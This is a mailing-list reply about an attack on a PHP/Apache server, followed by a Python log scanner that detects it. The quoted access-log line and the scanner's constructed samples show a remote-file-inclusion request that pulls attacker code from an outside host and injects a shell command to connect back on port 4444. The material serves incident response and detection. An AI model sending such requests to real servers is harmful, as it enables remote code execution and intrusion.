Re: Attack using php+apache



> If you have register globals off *or* safe mode on, this particular
> exploit is useless.
>
> If you had register globals on and safe mode off then he could run
> arbitrary programs as your Apache user.  It's possible he could run a
> local root exploiting program, but that's not as likely.
>
> > 200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 i686) Opera 7.11  [en]"
>
> I think the script is broken because that <db> file is not currently
> found.
>
> It's a really stupid script, it could have all been done with one file
> if he actually knew how to code PHP.
>
> How to tell if he got to root?  The only really sure way is to use a
> known-secure boot medium to examine every file on your filesystem that
> might be run with root privileges...
>
> Or you can check to see if he made it easy for him to find with the
> <chkrootkit> and <debsums> packages.  There are probably better options
> which people on this list could suggest.
>
> --
> Tom Goulet				mail: uid0@em.ca
> UID0 Unix Consulting			web:  em.ca/uid0/


Sorry, forgot to tell: chkrootkit and debsums are both OK.
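The quoted access-log line shows the two things worth alerting on in a register_globals-era PHP host: a query parameter whose value is itself a URL (the remote include) and shell metacharacters in a parameter. As an added example that is not part of this thread, here is a small Python scanner that parses Apache combined-format lines and flags both patterns; the sample lines are constructed (RFC 5737 test addresses, attacker.example) and only mirror the shape of the line quoted above.

```python
import re
from urllib.parse import unquote

# Apache combined log format, the same layout as the line quoted in the mail.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is a URL: the remote-include pattern register_globals
# made exploitable (area=http://... in the quoted line).
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Shell metacharacters that have no business in an ordinary query value.
SHELL_META = re.compile(r'[;|`$&]')


def analyse_request(path):
    """Return a list of findings for one request path including its query string."""
    findings = []
    query = path.partition('?')[2]
    # Split on '&' only, then percent-decode each value once; an embedded '?'
    # (app.txt?) stays inside the value instead of confusing a URL parser.
    for pair in query.split('&'):
        key, _, raw = pair.partition('=')
        value = unquote(raw)
        if REMOTE_URL.match(value):
            findings.append(f"remote URL in parameter {key!r}")
        if SHELL_META.search(value):
            findings.append(f"shell metacharacter in parameter {key!r}")
    return findings


def scan_log(lines):
    """Return (client ip, timestamp, findings) for every line that raises a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = analyse_request(m.group('path'))
        if findings:
            hits.append((m.group('ip'), m.group('ts'), findings))
    return hits


# Constructed sample log (not real traffic); line 1 mirrors the quoted request.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area=http://attacker.example/sc/app.txt?&cmd=cd%20/tmp;./db%20203.0.113.7%204444 HTTP/1.1" 200 4112 "-" "Mozilla/4.0"',
    '198.51.100.4 - - [15/Nov/2003:00:49:12 -0200] "GET /~joeuser/index.php?area=news HTTP/1.1" 200 3321 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [15/Nov/2003:00:50:03 -0200] "GET /~joeuser/index.php?area=ftp://attacker.example/x.txt HTTP/1.1" 200 4100 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, "; ".join(findings))
```

Run it against the real access log with `scan_log(open('/var/log/apache/access.log'))` and review every hit; a 200 status on such a request, as in the quoted line, means the include was served, not merely attempted.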